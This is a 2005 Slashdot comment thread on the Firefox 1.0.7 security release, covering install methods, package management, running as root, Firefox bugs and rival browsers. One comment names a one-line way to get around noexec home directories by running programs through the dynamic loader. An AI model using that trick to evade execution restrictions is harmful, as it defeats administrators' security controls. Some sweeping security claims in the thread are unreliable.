"The install was as easy as anything packaged by Vise or InstallShield"

Can you please pass some of that crack you seem to be smoking? I'm a big linux fan, but installing anything, not in the least a user install from firefox, does not compare with the "double click setup.exe" from vise or installshield.

And before all the fanboys knee-jerk with the security/spyware/virus/whatever-my-linux-kung-fu-i s-so-cool-i-kick-your-ass stuff - I know, i use linux and firefox. but that still doesn't make it an easy install. The distro install, incidentally, is pretty easy though, so just wait for the vendor updates mmmkay?

Re:Don't use your distro tools to install it...

[amdotaku]

I see your point, but using stand alone package installers and the like defeats the main purpose of the distribution system over just a plain old bacon and eggs OS like Windows. This is supposed to make the distro system easier to deploy mainly by administrators, but reducing the level of case-by-case support they have to dish out. For the home user, such solutions may work more easily, but it still defeats the whole point of a distro. For example, if a similar update attitude was suddenly adopted by all the dozens of projects used in the modern distro, one can clearly see how soon it would be before the whole thing would just fall apart.

Re:Don't use your distro tools to install it...

[Hank+the+Lion]

Now I have a version of Firefox that runs as me instead of running as root, which I'm sure is a lot more secure than the way I had it last time.
I don't think so.
Normally, you install as root, and run as user.
This means, that, as a user, you cannot damage your installation.
Now, you run as the same user that installed it.
This means that you can damage the installation as well.

Re:Don't use your distro tools to install it...

[gbjbaanb]

Then, as me, I set up a directory called Firefox107. I made a directory under that one called Firefox as the installation area for the install of Firefox 1.0.7. I then downloaded the Linux installer for 1.0.7 directly from mozilla.org. I untarred/gunzipped the installer into the Firefox107 directory. It made a firefox-installer directory under Firefox107 where I then clicked the firefox-installer script to start the install process. Again, I installed as me, not as root.

I don't know about you, but I clicked 'download now', then double-clicked 'Firefox Setup 1.0.7.exe', then I had a lie down, the effort required was just that bit too much for me. Bring on the auto-update, that's what I say!

Re:Don't use your distro tools to install it...

[c0d3h4x0r]

Someone seriously needs to mod the parent UP. This is a very insightful observation about one of the fundamental, systemic problems with desktop OSes (Linux-based and otherwise).

The fact that it is possible for an application to be installed by any mechanism other than the official method provided by the desktop/OS, thus straying from all standard conventions defined by the desktop/OS, means it's too easy for users to screw up and break things. The fact that an application must come with its own installation executable just illustrates how the desktop/OS is failing to provide the services the application developers need.

The desktop/OS should require a software package to provide a data-based manifest of installation actions it needs (generally similar to Microsoft's MSI/Windows Installer technology, but without the notion of Custom Actions), and the desktop/OS should execute the installation. And that should be the ONLY way for anything to get installed onto the system (unlike the architecture of Windows, where standalone installers such as InstallShield can still bypass the central MSI/Windows Installer way of doing things).

Re:Don't use your distro tools to install it...

[KenSeymour]

I am running Fedora and I got Firefox 1.0.6 as an update. According to this, the update rpm was available on Sept 10.

I can pull them down automatically either with up2date or I can use yum. I don't think I will have to wait long to get 1.0.7 that way.

Re:Don't use your distro tools to install it...

After reading this comment, i've realized that I'm done reading Slashdot.

Where do the informed 5 digit and below uid people hang out now? Technocrat? Arstechnica?? Where?

Re:Don't use your distro tools to install it...

how difficult are these?

apt-get install firefox
emerge firefox-bin

etc...

Re:Don't use your distro tools to install it...

[shellbeach]

Then do what I do: don't use your distro's tools to install Firefox, use their Linux installer and install to a subdir in your user directory.

Better yet, just get the firefox tar.gz archive rather than the installer and extract it where you will. (you can get it here: http://ftp.mozilla.org/pub/mozilla.org/firefox/rel eases/1.0.7/linux-i686/en-US/firefox-1.0.7.tar.gz )

It's really sad that to be able to download a simple archive, which is all that you need to run firefox, you have to go through the "other platforms" links, back up a directory and into the linux-i686/en-US/ directory - they've made it extremely difficult to find and new users wouldn't even be aware of its existence. Does every linux user now use this superfluous linux-installer instead??

Re:Don't use your distro tools to install it...

[jmcmurry]

Which is fine, except that Firefox 1.0.6 (linux-i686 en-US at least) appears to have been released on July 19. You waited nearly two months to get a security release.

This isn't your fault, of course, but it points out a problem with waiting for your vendor to release new versions of software with security fixes. I got Firefox 1.0.7 today because I'm installing it myself.

Re:Don't use your distro tools to install it...

[jZnat]

I've been a trunk tester for a few months now (first on win32 and now on GNU/Linux i686), and I must say that the binary patcher has come a long way from simply overwriting all the files with the most recent to making literal binary patches on actual changed files, and in both cases would restart Firefox with minimal bugs (which eventually get fixed as the binary patching system is an important feature for 1.5). It takes less than 6 seconds total to download the patch, apply it, and restart/reload Firefox on my system, so I'm sure it can be done faster on other systems as well. Of course I'd like to see some better system where distros can distribute the updates easier, but once this binary patching mechanism hits the mainstream Firefox users, I'm sure that it will only become an issue to system admins who would have to apply the updates across a large network of computers (which will also be easier with the .msi packages for win32 networks and whatnot).

Re:Don't use your distro tools to install it...

[jZnat]

I don't know about you, but according to my proclist, firefox-bin is running as a child of sh as a child of sh (eh?), all owned by matt (me). No root or any use of the 15+ other daemon users I have on my system...

Re:Don't use your distro tools to install it...

[shaitand]

This is a pretty serious troll. There is no install on windows, install shield or otherwise that you can install with a double click. The double-click starts the installer, then you answer a series of questions. Afterward, you configure the app manually.

On linux you apt-get install app or select it and then click install in synaptic. Then configure the app manually. For many things you can simply run appname-configure afterward to configure.

In case you haven't noticed, the processes are mostly the same, except that linux does not require you to answer the string of questions.

Re:Don't use your distro tools to install it...

[Mechcozmo]

How about this installation method:

Under OS X you drag and drop the application to anywhere. Everything that the application needs is contained within that package-- icons, executables, etc.
Some applications need installers and those use package installers. They install all the needed software or they can just install the software they are supposed to and leave the user to determine if they have all needed software-- it is up to the developer. This works rather nicely... you can download nearly anything and just double-click to run it from any location.

Re:Don't use your distro tools to install it...

[penguinoid]

Looks like you really don't know how linux works (or computers in general). Do you have any idea how difficult it would be to force programs to be installed by a single installer? You'd basically need an "antivirus" that detects any programs which have'nt been officially installed and prevents them from running. How would you prevent someone from downloading solitary.exe and running it (essentially a manual install)?. On the bright side, if someone does manage to do as you suggest, it would become that much easier to implement forced DRM :-)

Why do they call it "a new version"?

[fluor2]

It's only security fixes. Not much news here.

Re:Why do they call it "a new version"?

[skiman1979]

This new version went from 1.0.6 to 1.0.7. Usually if the minor version number increases (.6 to .7) it is because of minor bug/security fixes. Major changes to the application would warrent a change in the first (or maybe second) part of the version number.

Re:Why do they call it "a new version"?

[ross.w]

So the 64 bit version still won't work with any of the availabel plug-ins?

download mirrors are here

http://www.mozilla.org/mirrors.html

Re:download mirrors are here

... You do realize of course that downloading from the website goes through OUOSL's bouncer thing, which basically redirects you to a mirror, right? And that ftp.mozilla.org isn't a single machine, it's an alias for a bunch of mirrors?

Sure, getting from a specific mirror may be useful in cases... but probably not this one since you actually want a mirror with the file one it :)

Re:Censorship

Yes because random unsourced bitching about problems nobody else is having is likely to be an honest review of a peice of software and not a troll. If the GP wants to come back and make a mature but critical evaluation of firefox then they are welcome to do so, until then the troll moderation is very well deserved.

"Troll -1, ah, anyone disagreeing with Linux/Mozilla/GPL/Open Source beeing the best is ignored... Way to go. Learnt from China?"

Perhaps you need to stop the the whole "OMFG! Someone who I agree with was modded down!!11 This MUST be censorship!!!!!" thing.

Re:1.0.7?

lol what?

HP-UX Port

[lp_bugman]

I been searching everywere for a HP-UX port. What I don't understand is that mozilla has builds for OS2 but not for HP-UX. I don't know you guys but I think HP-UX has way more active users than OS2.
I know there is a "official" HP mozilla build. But I like more firefox (slimer and faster). Specialy because my desktop is not that fast (PA8500 400mhz).

Re:HP-UX Port

If only the HP-UX users would donate a build like the OS/2 users do..

I think I'll wait a week or so

[raitchison]

For Firefox 1.0.8 to be released

Can't Disable Quality Feedback Agent

If you try and do a custom install you can't disable the Quality Feedback Agent!!
Shit, at least Microsoft lets you disable this.

bummer

[bringmewater]

a new feature would have been nice

Re:My message...

[Jane_Dozey]

Hmmm...but FF *isn't* as secure as many people believed. The fansboys, for example, acted like it was bugless and totally secure (which no software is).

I LIKE the way all of these problems are being found (and fixed). It means they're not there anymore. Provided the FF devs don't put too much fluff into future releases it'll also mean a better browser which is good for everybody.

Just because MSFT's reorging today

[WillAffleckUW]

doesn't give Firefox the right to fix bugs while the Microsofties are distracted and obvlivious ...

Check your CPU usage.

[Futurepower(R)]

The huge RAM usage is not the biggest issue. After opening several windows and tabs, I often see something like 95% CPU usage even when I've closed everything except one tab. I submitted a Bugzilla report about that more than 2 years ago, an it was not fixed in Firefox 1.06.

Re:Check your CPU usage.

I've seen the same when opening certain pages, such as the MLB scoreboard page, and even individual game box scores when the page refreshes.

magnet and ed2k links

magnet (as in Gnutella, not Azureus) and ed2k links can be found on this page:

http://www.freebase.be/software.htm?Firefox

You need a recent browser, as the page uses a lot of javascript.

Re:Bad Ads (try this first)

[gosand]

I've had a problem with Firefox lately (starting around build 1.04, which may just be coincidental with a new malevolent popup technique being invented) on both my Windows and OSX boxes. Specifically, there are certain ads that cause Firefox to crash hard, and they aren't just bad ads from porn sites. I've occasionally gotten them on Blues News and NY Times for example...... If this isn't resolved soon, I just might have to give AdBlock another shot. I'm trying to be a good netizen, but when you're ads kill my browser, you leave me with little choice!

I noticed some of these too. Quite annoying. Instead of using Adblock or something similar, first try downloading a good hosts file for blocking ads. Info and links

Re:1.0.7?

so will i, but mainly because - after installing 1.5.1B, it took me close to 1/2 an hour of futzing around (uninstall 1.0.6, install 1.5.1B, plugins crash, display doesn't work properly... uninstall 1.5.1B, reinstall 1.0.6... nothing works... get coffee... uninstall 1.0.6, delete all files and registry entries related to Mozilla, or Firefox that were left after "uninstalling", get more coffee... re-install 1.5.1B... it looks like it works... download extensions... &c.

finally, i was able to get 1.5.1B to work... sorta. Adblock doesn't seem to be working, correctly, any more, ConQuery isn't available for the beta (and trying to force 'compatability' in about:config can cause some *really* obnoxious problems)...

frankly, i have less functionality, now, than i had with 1.0.6 and the plugins/extensions which i had installed, but i just do not want to go through all of the clean-up, and re-install process again, just to get back to what i had before... so, since i have things functional, i'll stick with what's currently working until it gets better. some of the stuff (e.g. dragging tabs, &c.) is nice, but not really new, since you could do all of that with extensions (e.g. MiniTab, &al.), before. the higher version number is not, in this case, an indication of greater stability, functionality, or what-have-you, however (at this time, from my perspective - i'm sure it will be better once [most of] the bugs are ironed out).

1.5.1B is *definately* a Beta release -- buggier than a SP1 M$ release (my usual litmus test for a beta canidate).

Package Management

[Al+Dimond]

This Firefox release is an opportunity for me to ask a question I've been thinking a lot about lately: on GNU/Linux, is the web browser a package that's better handled outside of the context of the distribution's package manager? I'm running Gentoo right now, and I love Portage, but there will at least be some delay between the Firefox release and a new ebuild being available. And in order to emerge this new release I'd need to sync my Portage tree again, which I don't have any other particular need to do right now (once or twice emerge sync has caused me problems, usually because it causes me to subsequently update some package that I originally emerged with USE flags set that I neglected to add to my make.conf).

Anyhow, the basic idea is that Firefox is a package that has to be updated at specific times, and I know when those times are, and they aren't necessarily times that my system as a whole needs to be updated.

There are few other packages that depend on Firefox; all I can really think of are plugins and extensions. Plugins don't typically require a specific FF version, and I get my extensions centrally from mozdev. So can you guys think of anything I'd lose by unmerging FF from Portage, installing a stub in its place, and just using the official builds from mozilla.org? Besides the potential optimization? (I would say integration and consistency with the overall system in terms of file placement and stuff, but... that doesn't seem to happen anyway. It's not an easy thing to fit a huge X application into Unix directory conventions based on the concept of many small programs doing one thing well...)

The main other package to which I'd apply this type of thinking is OOo. I wouldn't apply it to KDE or Gnome (though I don't directly use either) because they contain many useful libraries, and I feel that the handling of libraries is a real strength of package management systems. Can you guys think of any other packages that might not be best handled by package management?

Re:Package Management

[CrazedWalrus]

I'm a fresh convert to Gentoo from Fedora, but I've found that this system applies equally due to precisely the point you bring up.

Basically, I'm quite happy using the distro tools (rpm/portage/apt/yast/etc) to maintain the basic OS/Desktop, but I find that this is typically not the way I prefer to handle larger applications, such as Firefox, Thunderbird, and OOo, to a lesser degree.

For these applications, I create a versioned 'apps' directory under /usr/local. I then install these apps under /usr/local/apps/${appname}/${version}/, and use a 'current' symlink to point to the $version I'd like to use.

So, firefox 1.0.6 and 1.0.7 can be installed side-by-side with an easy migration between the two, backwards and forwards, by simply swinging the 'current' symlink. Once you're sure 1.0.7 works for you, delete the 1.0.6 directory. If it barfs or has weird bugs, change 'current' back, and you've instantly rolled back your 'installation'.

For firefox, I also have a 'plugins' directory on the level of the versions, and I replace the 'plugins' directory with a symlink to it so I don't have to re-install my plugins when I change versions.

The advantage of this is that you can vet the apps yourself instead of waiting for ${distro} maintainers to do it for you, and you have a very quick and easy backout if the upgrade breaks anything.

I'm sure there are people who will tell me this is overcomplicated and dumb, but I prefer not overwriting old installations with new ones until I'm sure the new ones work. This makes the upgrades mostly atomic, and allows me to replace OldNBusted with NewHotness faster than waiting for the distros.

Re:Package Management

[JahToasted]

Well the main disadvantage of not using your package management system is that, well, you will have to manage the package yourself. And like you pointed out, if there is a lot of dependencies it might be difficult.

The other disadvantage to not using the package management system is that you might get a version of firefox (or openoffice) that uses static linking a little more. This means it'll take more memory and may take a little more time to start up. Of course if you're compiling from source then you can disregard this paragraph, as you'll be guaranteed that it won't be statically linked.

There is also the possibility that there will be a library missing, but that's not very likely, and if it happens you'll know right away so you just switch to an older working version.

Your distro may also make tweaks to FF to make it play nicer with other apps.

I guess the only way to know for sure is to try it and see for yourself if there is any difference. Worst case you can always go back.

Re:Package Management

[oldosadmin]

emerge mozilla-firefox-bin

You aren't the only one who doesn't wanna compile it everytime.

OO.org and a few others have bin packages too.

Re:Package Management

but there will at least be some delay between the Firefox release and a new ebuild being available

Wrong. Gentoo's mozilla-firefox-1.0.6-r7, which fixes all the IDN etc. security issues, was released days before the official firefox 1.0.7 binary.

There are few other packages that depend on Firefox; all I can really think of are plugins and extensions.

Wrong. Gentoo allows you to compile anything that needs gecko against the firefox libraries (so that you don't need a copy of mozilla installed just to run evolution). As a result, many Gentoo users have lots of (especially Gnome) applications that link against firefox.

The main other package to which I'd apply this type of thinking is OOo.

Heh heh heh... Have you ever actually tried manually compiling openoffice from source? The OOo build process will kick you in the nuts, insult your mother, and destroy your hard drive. Fortunately for you, many good men had sacrificed their souls and sanity to create an ebuild that compiles openoffice correctly.

Re:Package Management

[timbo234]

It'd be good if users had a choice - there was a good way to make a package that installed on all Linux distros, perhaps using autopackage, so that people who wanted the latest-and-greatest of a particular Linux app could just install it.

I'm a big fan of Linux's package management systems - it makes it easy for people who don't/cant'/can't be bothered managing their own software installs. Eg. I can just go into MandrakeUpdate and update all the software on my machine, I can even script it to run every night so I never have to even touch the machine and have it always keep up to date.

On the other hand its a problem when you want the latest version of a particular app and you have wait either for it to come through the update system of your distro or even wait for the next version of your distro if its a non-security update or a completely new version (eg. OO.org 2).

Re:A week too late

[Haeleth]

I am just expressing an opinion. . . . It's not a contest, it's not a jihad, it's not a playground argument. It's just some guy making a remark.

It's some guy making a remark about how he thinks Opera is better than Firefox, in an article about Firefox. This is accompanied by a patronising coda that attempts to portray users of Firefox as stupid, insecure, and unable to control their emotions.

We have a term for that here on Slashdot: it's "flamebait". It's not generally considered a nice thing to post, you know. In fact, some people think that people who post comments like that are what we call "trolls".

And yes, the same applies to the people who were ranting about open source in the "Opera is free" article. But good little boys know that just because someone else did something naughty doesn't mean it's okay for you to do it as well. I hope you're not a naughty little boy, are you, kahei?

Who needs Firefox?

We have SeaMonkey now!

A little bug it didn't fix:

[dan_sdot]

A little bug it didn't fix is one that came up when I downloaded 1.0.6. I always click the spin wheel on my mouse to open a link in a new tab. This used to always work, but now it only works on certain link.
It is a little strange, but I think if the link is in bold or italics or is a jpeg, then it does NOT work. If it is in just plain text, then wheel clicking works.
For examples, got to here. Try wheel clicking on the "Read More..." link of any article. This does not work for me. Then try clicking on any of the Sections ("Apache", "Apple", "AskSlashdot", etc.) This DOES work for me.
Is this happening to anyone else? Is there a fix for this????

Re:A little bug it didn't fix:

[SpeckledJim]

All links work for me as expected. Currently still using 1.0.6 on XP.

Re:A little bug it didn't fix:

Works for me with Firefox 1.0.7 on WinXP SP2. Its possible that the middle click preference is disabled. To change it do the following:

1. Type about:config in the url bar
2. Search for middlemouse.openNewWindow

(Make sure the value is set to true, you can double click on it to toggle the value between true and false.)

3. Restart Firefox

Re:A little bug it didn't fix:

[jesser]

If you have any extensions installed, try disabling them and see if that fixes the problem.

Major bug: No X11 session support

[Theovon]

GNOME, KDE, and a number of other desktop environments support X11 sessions. Using this standard, an application can save its state when you log out and then restore it when you log back on. Most X11 apps support it to some extent or other. But Mozilla is the oddball in that it doesn't support it. Their bugzilla has an entry for this, which they've been ignoring for YEARS.

I guess Mozilla isn't as interested in being standards-compliant as they claim.

Argh...

[Dolda2000]

Now I'll have to waste the entire night recompiling 1.0.7 on my Gentoo systems. :)

On a more serious note, I'd be very glad if they took their time to fix the memory leaks in Firefox. Just keeping it running for a week increases its RAM usage by at least 100 MB.

Re:Argh...

[jonfr]

The memory bugs usally ends by Firefox crashing faster then Bill G. can say the word "Linux".

This memory bug is annoying.

I also run Gentoo Linux.

Will this fix the "always a flashing cursor " bug?

[British]

This one is strange.

On my work computer, there is ALWAYS a flashing cursor somewhere on the web page. It doesn't matter if there are no text entry boxes, etc, there's always one there.

The symptoms of this are a lagged up/down arrow key movement. You can't go up and down until that cursor is in the opposite side of the window.

Also, intermittently, paging up/down doesn't work, it pages down, but then instantly bounces right back up.

Yet, this doesn't happen at home. This is 1.0.6. Wish the download&install updates from within the app worked. That has never worked for me.

Re:1.0.7?

[amdotaku]

I know, and thats why I'm using it. I think that a majority of /.ers who do alot of strange but not high-importance web browsing should be using the beta over the newer 1.0.7 to help Mozilla debug the thing. I think it has potential as a decent update, but is currently in a position where they need a good test base. I didn't mean to suggest that admins should be putting this monster on workstations though!

Re:Will this fix the "always a flashing cursor " b

[bf21195]

Check your 'about:config' to make sure the 'accessibility.browsewithcaret' setting is set to 'false'

Different approaches.

[khasim]

Any data kept in your home directories SHOULD be backed up by the sysadmin.

The worst that should ever happen is that you lose any new data (from this morning until now).

The really important data is usually kept inside databases that the user does not have rights to delete.

Wiping out your home directory is only "annoying" (unless you have an important meeting in a few minutes).

Infecting the system is "BAD" because then EVERYONE's data is vulnerable AND you cannot trust last night's backups. You must go back and find out when you were infected and, in some cases, recreate ALL of the data that was in those databases since that point.

Sure, the user might be pissed that his spreadsheet was deleted by the "cool screensaver" that he just tried to download AND he has a meeting with the division president in the next 15 minutes ........

but that don't mean jack when the CFO notices that none of the numbers match for the last 3 months anymore.

I'm really tired of people claiming that not running as root is a miracle cure. Yes, it prevents some really nasty trivial attacks, but it doesn't protect your most valuable data (e.g. -- yours) and it doesn't prevent a lot of attacks that are perfectly happy to run in non-privledged space.

It's not a "miracle cure" but it does protect the most important information the company has.

Ideally, the user's home directories will be set to non-execute so that crap they download won't destroy their data.

Even with both of those in place, I still get people who DELETE THEIR OWN FILES and need them restored from the night before.

Security is all about IDENTIFYING the risks and REDUCING them.

I can reduce the risks of everything else to a point below that of regular human stupidity. But nothing will ever save you from that.

Re:Different approaches.

[Zathrus]

Any data kept in your home directories SHOULD be backed up by the sysadmin.

Yes, because we all know that everyone backs up their data on their home systems. Nightly.

Of course it's stupid, but I know very few people who do that -- and most of them merely rsync to another box, which may get infected as well.

The really important data is usually kept inside databases that the user does not have rights to delete.

Not on individual systems. Very little is kept in databases. For a lot of people, the loss of their photos, music, etc. all the way down to bookmarks, email, and contact lists would be pretty much the same as the HD crashing. I think you'll agree that the hardware is cheap -- the data is expensive.

As for recovery/removal -- most viruses/trojans are not destructive anymore, but instead try to infect to gain permissions (for spamming, DDoS, etc.) and you may wind up with an infected user space that goes back for months before you notice.

And backups don't address the issue of a user-space virus that proceeds to identify security holes and download rootkits to exploit them. Now you've got both a user and system level vulnerability.

Security is all about IDENTIFYING the risks and REDUCING them.

I agree. My point is that while not running as root may reduce some risks, it certainly doesn't eliminate them. The post I replied to (I quoted it in its entirety) certainly implied as much -- and it's an attitude that I see here repeatedly.

Re:Different approaches.

[drsquare]

1. Whose computer has a sysadmin? I know I can't even afford a cleaner, let alone someone to live in my hous and fix my computer when it goes wrong. What world do you live in?

2. A backup's no good if you've changed your data since then.

3. Not many people like fiddling with commands all the time, nor do they even know how to do so. We're not all super-nerds who know crontab and tar. Come back to the real world.

4. How can you trust a backup if the data may have been altered BEFORE you made the backup?

5. Where do you put the backup? I don't know of any home computers with tape drives, are we supposed to write all our data to a DVD every day? The only option is to copy a .tgz to another directory, but a user only has permissions in his own directory so if it's wiped then the backup is wiped as well.

Ideally, the user's home directories will be set to non-execute so that crap they download won't destroy their data

What world do you live in?

Re:Different approaches.

None of your posturing in any way refutes the fact that it is trivial to get root in almost any version of Linux.

Re:Different approaches.

[CFrankBernard]

I thought the point about non-execute on home directories was good. Doesn't this mean that the person can still read/write files/docs, but not run executible files located there (or maliciously placed there)?

Re:Different approaches.

[Da+Twink+Daddy]

Ideally, the user's home directories will be set to non-execute so that crap they download won't destroy their data.

Of course, unless you have developers on the box that need to run their executeables

Or, a power-user that wants to automate a few things with a bash script. Sure, you could always make them, do '/bin/bash <script>'

Oh, wait! I guess the developers could just do '/lib/ld-linux.so <executable>'. Er wait, doesn't that mean the attacker could too!?

noexec annoys your users and doesn't stop dedicated attackers. Best not to use it.

Re:Different approaches.

The bypass for noexec posted above has been altered to prevent the dissenination of dangerous information.

Damage control?

[Jackie_Chan_Fan]

Any relation between this release and all the bad firefox press? :)

Re:1.0.7?

[GreatBunzinni]

I'll keep using 1.5 beta 1, thank you.

As it curently is, Firefox 1.5 beta isn't for everyone. I installed it an ran it when it was launched and I simply can't use it. It just segfaults at startup without warning what caused it.

I don't know if this problem is frequent or if there is a fix for it but at least that little showstopper made it impossible for me to try 1.5.

Mod parent +25.

[khasim]

It seems that certain organizations are trying to hype every vulnerability that can be associated with FireFox. From my point of view they'd be ranked like this:

#1. Remote root access that does NOT require human intervention or other app running.

#2. Remote non-root access that does NOT require human intervention or other app running.

#3. Local root access that does NOT require human intervention or other app running.

#4. Local non-root access that does NOT require human intervention or other app running.

#5. Local root access that requires some human interaction or some combination of apps.

#6. Local non-root access that requires some human interaction or some combination of apps (this is where this exploit is)

#7. Remote OS crash

#8. Remote app crash

#9. Local OS crash

#10. Local app crash

This is MY opinion. Get your own opinion. There is no way this exploit is "critical". It's one step above a stupid DoS attack and would NOT affect ANY of my servers.

Re:Mod parent +25.

[alexq]

This is MY opinion. Get your own opinion. There is no way this exploit is "critical". It's one step above a stupid DoS attack and would NOT affect ANY of my servers.

You run firefox on your servers?

My point being that firefox is a user app, and that (as stated elsewhere in this thread) as far as a user is concerned, either threat is more or less equally dangerous (think data integrity, for instance).

Adblock and Duplicate Tab work.

[tempshill]

Adblock and Duplicate Tab work. Are you running that Firefox extension that blasts spam to all the people in your Outlook contacts list?

So submit a bug

[tempshill]

https://bugzilla.mozilla.org/

1.0.7 source

[shudde]

For those who've been looking for it (LFS people and a few randoms on forums), the source for Firefox 1.0.7 won't be available on the Mozilla FTP for a while yet. There's a pending bug, apparentally to do with the nightly being rebranded to 1.0.7, and the devs will release it when it's been fixed (no estimated time was given).

Re:Will this fix the "always a flashing cursor " b

[British]

Well, I'll be damned. That did the trick. Thanks.

Re:Will this fix the "always a flashing cursor " b

[buraianto]

It is also an option on the advanced pane of the options panel.

There's a new Flash Player for Windows too...

[antdude]

See here:

ile size: 926 K
Download Time Estimate: 2 minutes @ 56K modem
Version: 8,0,22,0
Browser: Netscape, Mozilla, Firefox, Opera, and CompuServe
Date Posted: 9/12/2005
Language: English

I haven't used it. I did hear it is a lot faster for Safari according to MacOSXHints.

thinking of grandpa

back in my day, software developers could do EVERYTHING at once!

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:1.0.7?

Are you using the SELinux extenstions? I read that it can bork Firefox sometimes.

But did they fix the terrible copy & paste pro

But, did they fix the terrible copy & paste buffer problems which have always plagued FireFox on MS-Windows???

They ruin all other applications on the desktop. I can only assume FireFox is somewhere forgetting to release a handle to the copy buffer. :(

Re:A week too late

[LupusUF]

while I am using Opera right now (I downloaded it back when they had the party where they gave away free codes), I doubt I will keep it. While some pages that didn't work for firefox do work for Opera, I have noticed the oposite as well...and the pages that don't work for Opera are more important to me than the ones that don't work for firefox. Opera has also crashed on me several times, and I have never had a problem with firefox crashing.

I honestly don't care about the whole open source thing. I don't have a problem with companies keeping their source private. Hell, they wrote it. However, it seems to me that firefox is simply a better product that either IE or Opera.

Nice Job Fuckheads

Hey great, all of my sage feeds are gone.

Good job Mozilla.

You're getting fat, apparently, and turning into Microsoft. Keep up the good work.

Let me know when you create a good browser. I look forward to that.

Avoid Virus-Ridden Mozilla Software

Since it has been shown http://linux.slashdot.org/article.pl?sid=05/09/21/ 1252213&tid=154&tid=172&tid=106 that Mozilla (and therefore Firefox) may be infected by virus, everyone would be well advised to avoid downloading this software which has not been signed and authorized by Microsoft.

Before you mark me "Troll", please take note of the tongue in my cheek.

Read the release announcement

[brettlbecker]

Dude, it says, right there in the release annoucement linked to from the /. article, "an equivalent update to the Mozilla Application Suite, Mozilla 1.7.12, is expected shortly."

The way you sound, you seem to think you'd have to wait ages for any kind of update to Mozilla. As it stands right now, most people who use automatic updates for Firefox will have to wait a couple days for the update to appear for them.

Get a grip.

B

FIX: Disable - Restart - Enable - Restart

[kshakir]

I found that I had to disable each extension by hand, restart, re-enable them by hand, restart, and most are back (haven't checked all of them...).

'Tools' Menu > Extensions > Right-click > Disable

not only flash

[DJK]

At home, I don't have flash installed, and Fx still tends to gobble up memory.

Because of the Java plugin.

Maybe something's wrong with Fx's plugin architecture?

Firefox, IE and Opera

On Windows, I switched from:

Netscape -> IE -> Mozilla -> Firefox (in 2004) -> Opera 8.5 (yesterday)

I wish Firefox 2.0 would incorporate some of the featuers of Opera and the next release of Opera would take some from Firefox.

After a day of using Opera 8.5, I've decided to make it my primary browser. I'm hoping Firefox 2.0 is good enough for me to switch back.

But there are some Firefox 1.06 features that I really miss in Opera 8.5--but not enough for me to go back to Firefox 1.x.

For example, the SEARCH feature in firefox where every matching instance of the word/phrase is highlighted on the page. Also, the COOKIES prompt that comes up (disabled by default in Opera) is simpler in Firefox--it doesn't have as many dropdown choices on what to do--Opera should make a less-advanced dialog available like the one in Firefox. And I got used to the tab pages being below the address bar in Firefox--Opera should let user place tabs there too in case they don't like the new position (I didn't like it for a few hours but now I prefer it).

In terms of what I'd like to see Firefox take from Opera:

1. no more random 100% cpu hogging on Windows that I got with Firefox = 1.06
2. speed. Opera feels snappier (on a 500mhz pc)
3. the nifty auto-hiding dropdown panel that appears when clicking on the address bar, which includes bookmarks, top-10 list, amazon search, etc.
4. ability to quickly change browser identification (IE vs Mozilla vs Opera) by selecting a menu--no need to edit config or dig into dialogs for this. for example, I keep it on Opera except when visiting sites that require IE. I'm guessing IE will show a jump in marketshare starting this month because Opera 8.5 defaults to identifying itself as IE.

Both Firefox 1.07 and Opera 8.5 are currently far superior to IE6--lets see what IE7 brings.

HUGE Firefox INSECT.

[Futurepower(R)]

That's an important observation. Can you provide more explanation, and the URLs?

I visited the Major League Baseball site: http://www.mlb.com/ and my Firefox 1.06 CPU use jumped to 19%, with all pages loaded and NO browser activity.

I wish they would fix this; they've known about it for years. It has something to do with the Flash plugin, I understand.

This bug is a show-stopper for me. I wish they would concentrate on it.

Re:HUGE Firefox INSECT.

[setzman]

The worst: http://sportsillustrated.cnn.com/baseball/mlb/scor eboards/today/ Also, individual game box scores while the game is in progress cause high cpu usage during the refresh.

Re:HUGE Firefox INSECT.

To be fair, cpu usage in IE is also high on this page. However, the system "seems" more usable while IE is reloading this page rather than when Firefox is reloading it. On the memory issue, I closed both browsers, loaded them back up (both started at Google.com), then went to the MLB scoreboard at si.cnn.com. Firefox was using 24000K compared to around 18000K for IE.

Hehehe Software Racism

[pietvdm]

At the end of the day we can but laugh and lock-up our browsers. This guy's post on software racism Hat With Feet has an interesting view. No doubt we all experienced it at least once!

Does FireFox have a test suite?

[Peaker]

Or do they rely on much user testing?

Same problem here

[SpammersAreScum]

I noticed the same thing with 1.0.6 on my Windows XP system. Clicking middle on "Read More" fails, but clicking middle on the article count link works. Similarly, some links in Google search results can be middle-clicked, others cannot. Dunno why.

Re:Same problem here

exact same thing happening to me! can't find it on bugzilla. using 1.07 now and still happening.

Parent +1 Grandparent -1

Unless the GP can find some more supporting evidence, it sounds like some misinformed nonsense.

Re:Will this fix the "always a flashing cursor " b

Just press F7. It switches the caret browsing mode on/off.

Works for me

[rg3]

I'm using Firefox 1.0.6 under Slackware Linux. Everything works as expected.

--Deer Park--

This is Important.

It will be a bit better 1.5 is build with debuging on it slows it down a little.

Each version of firefox has got a little faster.

Links is almost unable to be bested on speed. Lot less features a heck more speed. I will recommend this browser from time to time just for its speed. Great in some job sites get threw then in half the time.

Konqueror beats firefox due to opengl and less features. Hmm firefox with opengl support that would be nasty. Firefox Cairo would be even better vector based icons on all platforms. New power thems. Everything Zoomable. I hope it comes. That would kind screw with Microsoft.

point release?

[weighn]

here's what wikipedia says:
major.minor[.revision[.build]]

although the naming convention isn't clear moving from 1.0.6 to 1.0.7 is a revision release.

You might want to say 1.5 will be a new version, but the others are, as you say, security fixes or point releases.

Oh Symantec

[SantiagoRoza]

Symantec the-company-that-sells-security-software-oriented- to-Microsoft-products says Firefox isn't really that much more secure than IE:
http://software.silicon.com/security/0,39024655,39 152423,00.htm

But Symantec the-company-that-sells-security-information (through its controlled company SecurityFocus) says IE 6 SP2 has 57 unpatched vulnerabilities, compared to Firefox's 3:
http://www.securityfocus.com/cgi-bin/index.cgi?l=1 &c=12&vendor=Microsoft&version=6.0%20SP2&title=Int ernet%20Explorer
http://www.securityfocus.com/cgi-bin/index.cgi?l=1 &c=12&vendor=Mozilla&version=1.0.6&title=Firefox
http://www.symantec.com/press/2002/n020717.html

Hmm, conflict of interests...?

WTF?! Are the moderators illiterate now?

The parent made a good point, not a troll. Found bug means 1 less bug which means (provided the developers don't put too much more code into next release) less bugs in the browser. Get it? How is saying that trolling now? It's a pretty simple observation. The fact the the parent likes their software less buggy doesn't make him/her a troll.

Stop with the crappy moderations!

Re:1.0.7?

[jesser]

